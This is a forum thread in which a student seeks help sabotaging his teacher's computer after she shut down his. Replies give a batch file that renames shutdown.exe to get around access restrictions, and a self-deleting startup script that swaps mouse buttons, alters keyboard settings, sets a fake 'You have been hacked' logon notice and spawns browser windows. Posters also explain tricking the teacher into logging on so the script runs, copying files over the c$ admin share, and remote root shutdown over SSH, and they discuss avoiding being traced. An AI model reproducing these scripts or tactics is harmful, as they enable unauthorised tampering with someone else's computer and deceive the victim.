ganglia
+ Reply to Thread
Page 1 of 5 123 ... LastLast
Results 1 to 15 of 81

Thread: Shutdown Using MS-DOS

Hybrid View

  1. #1
    Unregistered Guest

    Shutdown Using MS-DOS

    My bitch teacher just shutdown my computer so I'd like to return the favor. When I try to shut her computer down in command prompt, it says access denied. Is there anyway I can go around that?

    Thanks.

  2. #2
    ABHIS Guest

    Re: Shutdown Using MS-DOS

    Originally posted by Unregistered
    My -------- teacher just shutdown my computer so I'd like to return the favor. When I try to shut her computer down in command prompt, it says access denied. Is there anyway I can go around that?
    Thanks.
    *.I need to know if the Operating System is WinXP or W2K
    2.Is the computer part of a LAN, is the open session belongs to the admin group?
    *.what is exactly the command that you typed <i>shutdown -s</i> ??? when you get the "access denied" message

    Off hand I would do the following that might evntually work:
    *. open with notepad or edit an empty file (on your computer)
    2. copy then paste these lines in this file

    copy %windir%\system*2\shutdown.exe %windir%\system*2\abcd*2*4.exe
    call abcd*2*4 -s

    *. save the file and name it abcd.bat
    4. copy this abcd.bat file to the target computer and run the abcd.bat

    ABHIS (a guest)

  3. #3
    ABHIS Guest

    Re: Re: Shutdown Using MS-DOS

    Originally posted by ABHIS
    [B
    4. copy this abcd.bat file to the target computer and run the abcd.bat
    [/B]
    By the way, if all PCs are connected on LAN (network), simply copy abcd.bat to a shared commun folder accessible all over the network.
    Go to the target PC, locate abcd.bat where you put it, hit it (AND RUN)

  4. #4
    Unregistered Guest

    Re: Re: Shutdown Using MS-DOS

    Originally posted by ABHIS
    *.I need to know if the Operating System is WinXP or W2K
    2.Is the computer part of a LAN, is the open session belongs to the admin group?
    *.what is exactly the command that you typed <i>shutdown -s</i> ??? when you get the "access denied" message

    Off hand I would do the following that might evntually work:
    *. open with notepad or edit an empty file (on your computer)
    2. copy then paste these lines in this file

    copy %windir%\system*2\shutdown.exe %windir%\system*2\abcd*2*4.exe
    call abcd*2*4 -s

    *. save the file and name it abcd.bat
    4. copy this abcd.bat file to the target computer and run the abcd.bat

    ABHIS (a guest)
    The operating system is XP and is connected by LAN.
    I attempted to shut it down by shutdown -i and searching for it. I found it, but "Access is Denied" came up. I'm not in there right now, but I'll try it tomorrow and let you know how it worked.

    asdfgjkloo

  5. #5
    Unregistered Guest

    Re: Re: Shutdown Using MS-DOS

    Originally posted by ABHIS
    *.I need to know if the Operating System is WinXP or W2K
    2.Is the computer part of a LAN, is the open session belongs to the admin group?
    *.what is exactly the command that you typed <i>shutdown -s</i> ??? when you get the "access denied" message

    Off hand I would do the following that might evntually work:
    *. open with notepad or edit an empty file (on your computer)
    2. copy then paste these lines in this file

    copy %windir%\system*2\shutdown.exe %windir%\system*2\abcd*2*4.exe
    call abcd*2*4 -s

    *. save the file and name it abcd.bat
    4. copy this abcd.bat file to the target computer and run the abcd.bat

    ABHIS (a guest)
    I tried it, but it didn't work. It kept trying to shut me down (luckily I know about shutdown -a).

  6. #6
    Join Date
    Jan 2005
    Posts
    623
    I wrote this and placed it in active directory for a woman i was not very keen of. This should be fun for you teacher to deal with.

    Put This Under All Users and make her log onto your computer...

    SAVE AS WinHelp.BAT and place the file here
    C:\Documents and Settings\All Users\Start Menu\Programs\Startup


    --------------------------------------------
    echo off
    echo REGEDIT4 >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_CURRENT_USER\Control Panel\Mouse] >> c:\reg.reg
    echo "SwapMouseButtons"="*" >> c:\reg.reg
    echo "MouseSpeed"="*" >> c:\reg.reg
    echo "DoubleClickSpeed"="*00" >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_CURRENT_USER\Control Panel\Key***rd] >> c:\reg.reg
    echo "Key***rdDelay"="5" >> c:\reg.reg
    echo "Key***rdSpeed"="*0" >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main] >> c:\reg.reg
    echo "Start Page"="http://www.google.com/" >> c:\reg.reg
    echo.
    echo [HKEY_CURRENT_USER\Control Panel\Desktop] >> c:\reg.reg
    echo "PaintDesktopVersion"=dword:* >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> c:\reg.reg
    echo "LegalNoticeCaption"="YoU HaVe BeeN HacKeD" >> c:\reg.reg
    echo "LegalNoticeText"="Please contact *-800-255-*700" >> c:\reg.reg

    REGEDIT /s c:\reg.reg
    start iexplore.exe [url]www.google.com[/url]
    start iexplore.exe [url]www.google.com[/url]
    start iexplore.exe [url]www.google.com[/url]
    del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat"
    exit
    -------------------------------------
    Edited for links.
    Last edited by DATA; 02-13-2005 at 11:04 AM.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  7. #7
    Join Date
    Jan 2008
    Posts
    1

    help

    How do you stop this batch file from runnning and make the "You have been haked" stop coming on.
    That was posted by Syntax****** on 02-*2-2005, 05:*0 AM
    I need it to stop running.


    Quote Originally Posted by SyntaX****** View Post
    I wrote this and placed it in active directory for a woman i was not very keen of. This should be fun for you teacher to deal with.

    Put This Under All Users and make her log onto your computer...

    SAVE AS WinHelp.BAT and place the file here
    C:\Documents and Settings\All Users\Start Menu\Programs\Startup


    --------------------------------------------
    echo off
    echo REGEDIT4 >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_CURRENT_USER\Control Panel\Mouse] >> c:\reg.reg
    echo "SwapMouseButtons"="*" >> c:\reg.reg
    echo "MouseSpeed"="*" >> c:\reg.reg
    echo "DoubleClickSpeed"="*00" >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_CURRENT_USER\Control Panel\Key***rd] >> c:\reg.reg
    echo "Key***rdDelay"="5" >> c:\reg.reg
    echo "Key***rdSpeed"="*0" >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main] >> c:\reg.reg
    echo "Start Page"="http://www.google.com/" >> c:\reg.reg
    echo.
    echo [HKEY_CURRENT_USER\Control Panel\Desktop] >> c:\reg.reg
    echo "PaintDesktopVersion"=dword:* >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> c:\reg.reg
    echo "LegalNoticeCaption"="YoU HaVe BeeN HacKeD" >> c:\reg.reg
    echo "LegalNoticeText"="Please contact *-800-255-*700" >> c:\reg.reg

    REGEDIT /s c:\reg.reg
    start iexplore.exe [url]www.google.com[/url]
    start iexplore.exe [url]www.google.com[/url]
    start iexplore.exe [url]www.google.com[/url]
    del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat"
    exit
    -------------------------------------
    Edited for links.

  8. #8
    Join Date
    Dec 2007
    Posts
    141
    I haven't read the whole thread or really what this is about but you should be able to press Ctrl+C to stop anything running in a command prompt. As something else I don't know if anyone else has added this but the command prompt shutdown tool can be used to stop Windows from shutting down. Say you ended a critical process such as smss and Windows gives you that Windows must shutdown message, you can open a command prompt and stop the shutdown by typing something like "shutdown -a" and the pop up will disappear.

  9. #9
    Join Date
    Nov 2007
    Posts
    52

    Lightbulb another option

    to shutdown a computer, if you are running on windows, you could use something like SSH, in linux you can conect to another terminal of you LAN, if you know the ipīs an the user/password, try to do it.....


    *.-go to terminal
    2.-log like root
    *.-type this...."ssh login@ipadress" (ssh sirgrifin@**2.*68.*.64) hit enter.
    4.- its going to ask you for the password, you have to type it and hit enter again, now you are conected with this pc in a terminal via telnet.
    5.- now you are conected via telnet for some port i dont remeber, now log like root on this computer, using "su" and type the pass the same u use to get into this computer...
    6.- to shouting down you just comands like "halt" "shut down now" "reeboot" things like this and by this way u can do it.

    well about windows there are a lot of programs you can install on you pc, in you LAN, and run it knowing the ips and enjoy you damn free time shuting down computers.....
    Your lifestyle determinates your deathstyle...AD ASTRA PER ASPERA

  10. #10
    Join Date
    Nov 2007
    Posts
    52

    Lightbulb another option

    to shutdown a computer, if you are running on windows, you could use something like SSH, in linux you can conect to another terminal of you LAN, if you know the ipīs an the user/password, try to do it.....


    *.-go to terminal
    2.-log like root
    *.-type this...."ssh login@ipadress" (ssh sirgrifin@**2.*68.*.64) hit enter.
    4.- its going to ask you for the password, you have to type it and hit enter again, now you are conected with this pc in a terminal via telnet.
    5.- now you are conected via telnet for some port i dont remeber, now log like root on this computer, using "su" and type the pass the same u use to get into this computer...
    6.- to shouting down you just comands like "halt" "shut down now" "reeboot" things like this and by this way u can do it.

    well about windows there are a lot of programs you can install on you pc, in you LAN, and run it knowing the ips and enjoy you damn free time shuting down computers.....
    Your lifestyle determinates your deathstyle...AD ASTRA PER ASPERA

  11. #11
    Join Date
    Sep 2007
    Posts
    3

    Lightbulb Try this small utility (Very nice one)

    Try this small utility!
    yermy.com/forum

  12. #12
    ABHIS Guest

    Re: Re: Re: Shutdown Using MS-DOS

    Originally posted by Unregistered
    I tried it, but it didn't work. It kept trying to shut me down (luckily I know about shutdown -a).
    Where you able to run the .bat file on the teacher's PC?
    I need to know if "Access is Denied" was related to the newly created .bat file or to the abcd*2*4.exe file.
    It makes all the difference, see why:
    In most school, corporation (like ours), the admin group limits the access to some selected .exe/dll/bat/..executable program.
    They are authenticated by their MD5 (using protection similar to SSM).
    When you ask a program to run, the systemm checks its MD5, decides to grant access or not depending on the database autorised programs.
    If you insert a CDROM (setup.exe, autorun.exe) or run a new exe or even a new virus, even if you call it by the same name of a previously autorised program, it does not have the same MD5, it will be rejected.

    Therefore, in case your newly injected abcd.bat was able to run, means that THERE IS NO PROTECTION based on selected autorised executables.
    If however this protection exists, I am sure that you won't be even able to run regedit.exe

  13. #13
    Join Date
    Jan 2005
    Posts
    623

    Question

    Can you send me a link so i can read up on the MD5 authentication. I've never heard of it but is sounds like a good way to completely control what kids are doing on the computers. I think the access denied is just b.c of his "user" privledges trying to shutdown another persons computer on a lan... Ive seen the same error trying to shutdown a computer while logged on as a standard user.

    Since the TEACHER is logging on to his computer will the MD5 lockdowns still take place if she is an network admin? I'm guessing the MD5 authentication would tie into the Active Directory Server and grant her full permissions once she is logged onto his computer. Hopefully its not on a local base...

  14. #14
    Unregistered Guest

    Re: Re: Re: Re: Shutdown Using MS-DOS

    Originally posted by ABHIS
    Where you able to run the .bat file on the teacher's PC?
    I need to know if "Access is Denied" was related to the newly created .bat file or to the abcd*2*4.exe file.
    It makes all the difference, see why:
    In most school, corporation (like ours), the admin group limits the access to some selected .exe/dll/bat/..executable program.
    They are authenticated by their MD5 (using protection similar to SSM).
    When you ask a program to run, the systemm checks its MD5, decides to grant access or not depending on the database autorised programs.
    If you insert a CDROM (setup.exe, autorun.exe) or run a new exe or even a new virus, even if you call it by the same name of a previously autorised program, it does not have the same MD5, it will be rejected.

    Therefore, in case your newly injected abcd.bat was able to run, means that THERE IS NO PROTECTION based on selected autorised executables.
    If however this protection exists, I am sure that you won't be even able to run regedit.exe
    I didn't open it from her computer. If i could do that, i would just go to Start, Shutdown.

    If I put the batch file ABHIS made in her startup, will it boot up, and shutdown as soon as abcd.bat is accessed?

    Same with SyntaX******'s file. Will it open all those websites and mess up her mouse, key***rd and display those lovely little messages as soon as it is started?

    If so, that would be fucking hilarious, lmao

    One more thing. If I do this and fuck up her computer, will they be able to trace it back to mine?

    Thanks, asdfghjkloo

  15. #15
    Join Date
    Jan 2005
    Posts
    623
    Bad News- You wont be able to put the file in her startup folder ~

    UNLESS she has her C:\ drive shared giveing all users permission to it. Test it out to see...

    Copy "PathOfFileOnYourComputer" "\\HERIPORCOMPUTERNAME\c$\"
    -If this works WOW, copy the file to her startup folder- Expect an Access Denied b.c i really doubt it is shared.

    About your conserns... She wont know what happened b.c the file deletes itself after it runs. It also does NO damage. It just tweaks the shit out of windows. I could add some other commands but this is just an old batch i wrote last year. I can make windows do whatever you would like it to do. Just let me know what you want and ill create it.

    UNDERSTAND HOW TO RUN THE FILE
    ------------------------------
    *. You do NOT run the file
    2. You place the file here on your LOCAL COMPUTER
    C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
    *. You tell her you cant log onto the computer, ask her to help you... Get her to log onto the computer with her own username and password which will automatically start the program as soon as she logs into windows.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

+ Reply to Thread

Similar Threads

  1. shutdown
    By waseem1g in forum Internet Privacy
    Replies: 9
    Last Post: 07-31-2008, 05:30 AM
  2. shutdown script as an exe?
    By Austin504 in forum Viruses and Trojans
    Replies: 2
    Last Post: 05-28-2008, 03:02 PM
  3. Help, Net Use to shutdown remote
    By NetNewbie in forum Proxies and Firewalls
    Replies: 0
    Last Post: 08-20-2005, 07:03 AM
  4. Shutdown Command for W2k?
    By Unregistered in forum Internet Privacy
    Replies: 0
    Last Post: 04-05-2005, 01:18 PM
  5. How to shutdown website?
    By Unregistered in forum Viruses and Trojans
    Replies: 9
    Last Post: 02-21-2005, 10:23 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts